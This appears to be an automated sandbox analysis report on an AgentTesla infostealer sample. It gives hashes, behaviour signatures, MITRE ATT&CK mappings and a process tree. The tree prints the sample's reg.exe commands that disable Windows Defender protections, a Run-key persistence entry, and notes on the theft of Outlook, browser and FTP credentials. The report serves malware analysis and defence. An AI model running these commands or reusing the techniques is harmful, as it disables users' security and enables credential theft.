Analysis
-
max time kernel
115s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
05-06-2024 10:46
Static task
static1
Behavioral task
behavioral1
Sample
97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe
-
Size
660KB
-
MD5
97ea1072cc7564dca5cd5cdc06f46477
-
SHA1
9fc2ef97d8cbfc3bce5bf761bef1b2bea3559dbf
-
SHA256
830c00fa954d70ef4fb399992385cbc21cd3ccfaf937ecb796c1c736b8a13556
-
SHA512
10c06d9370ea00cc2de10141e1c5a7d50d1ee7451bcac5fece84f3465d2305cc6efc99383a7b4068bcbc7b21c8880a478996193a0e0cba0c5bb55ed08672c454
-
SSDEEP
12288:9crNS33L10QdrXP/X+tGfn/NWQ9nad+hkSpjHqARv+5JkFfwcJaZY81X:ANA3R5drXPrf/B5HzRv+rkCPZF1X
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
AgentTesla payload 1 IoCs
resource yara_rule behavioral2/files/0x00070000000233c0-17.dat family_agenttesla -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
pid Process 2852 avdisble.exe 4940 sample.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sample.exe Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sample.exe Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sample.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cCNVeCBl = "C:\\Users\\Admin\\AppData\\Roaming\\OYwEIOW\\VeBRa.exe" sample.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 api.ipify.org 31 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4940 sample.exe 4940 sample.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4940 sample.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4940 sample.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1112 wrote to memory of 2852 1112 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe 82 PID 1112 wrote to memory of 2852 1112 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe 82 PID 1112 wrote to memory of 2852 1112 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe 82 PID 2852 wrote to memory of 4280 2852 avdisble.exe 85 PID 2852 wrote to memory of 4280 2852 avdisble.exe 85 PID 4280 wrote to memory of 4008 4280 cmd.exe 86 PID 4280 wrote to memory of 4008 4280 cmd.exe 86 PID 4280 wrote to memory of 1100 4280 cmd.exe 87 PID 4280 wrote to memory of 1100 4280 cmd.exe 87 PID 4280 wrote to memory of 512 4280 cmd.exe 88 PID 4280 wrote to memory of 512 4280 cmd.exe 88 PID 4280 wrote to memory of 456 4280 cmd.exe 89 PID 4280 wrote to memory of 456 4280 cmd.exe 89 PID 4280 wrote to memory of 2560 4280 cmd.exe 90 PID 4280 wrote to memory of 2560 4280 cmd.exe 90 PID 4280 wrote to memory of 4992 4280 cmd.exe 91 PID 4280 wrote to memory of 4992 4280 cmd.exe 91 PID 4280 wrote to memory of 1972 4280 cmd.exe 92 PID 4280 wrote to memory of 1972 4280 cmd.exe 92 PID 4280 wrote to memory of 2904 4280 cmd.exe 93 PID 4280 wrote to memory of 2904 4280 cmd.exe 93 PID 4280 wrote to memory of 1444 4280 cmd.exe 94 PID 4280 wrote to memory of 1444 4280 cmd.exe 94 PID 4280 wrote to memory of 3316 4280 cmd.exe 95 PID 4280 wrote to memory of 3316 4280 cmd.exe 95 PID 4280 wrote to memory of 1436 4280 cmd.exe 96 PID 4280 wrote to memory of 1436 4280 cmd.exe 96 PID 4280 wrote to memory of 536 4280 cmd.exe 97 PID 4280 wrote to memory of 536 4280 cmd.exe 97 PID 1112 wrote to memory of 4940 1112 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe 102 PID 1112 wrote to memory of 4940 1112 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe 102 PID 1112 wrote to memory of 4940 1112 97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe 102 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sample.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sample.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\97ea1072cc7564dca5cd5cdc06f46477_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisble.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisble.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\43DF.tmp\43E0.tmp\43E1.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisble.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:4008
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1100
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:512
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:456
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4992
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1972
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:1444
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:3316
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:1436
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sample.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sample.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4940
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD549910cb3f37fd8841e0d99a5d4c3a5e3
SHA1da9a68b48304fe8b5ba377bc7ef06a94c649c525
SHA256203995fcd8cd29dfcb929f06676c258a8b35a62719863a6dfec4aa1b0f5a0a90
SHA51203281eb739041cdeffc1eab96c12d3e7d20ade1ab588af3cb7e56c1d7f83ce668290a36553f5f0a3aa119a561d8e5bf4e7ad87549bebc245d28b68c4db8f4ee9
-
Filesize
90KB
MD56fe5c9b4c64e330be1f56a263fbfa620
SHA1764633b8102846fcbc83850178ec58ece2fa0ed0
SHA256904989b89c9185917059924a585ce9c7f9d18e928bc429c2ea93d058ac73396f
SHA512c2204ee708a7088c7262042d099e3942ea8c453df0c2615ae72d9f2f5b2e871c6f0fdae50459df16e3d5c103449693aac716f4a2a83408771b5c476e2fec65e4
-
Filesize
284KB
MD5b247c1e7766568af825a09eb81c55936
SHA1946d40d213944a4042328f79089f09069f027c99
SHA25614d7bdb0ce532036ac9830842c936d22c4cac6bd3972f7dc52550bda4fd9dd64
SHA5121b469808f863741811d195c55fd30acda1830dc0ffc89c0037bc5b63581391608795b6ed9708361286c65fae40ea31bf71643e2ed3f97aec44661b82ebb7c481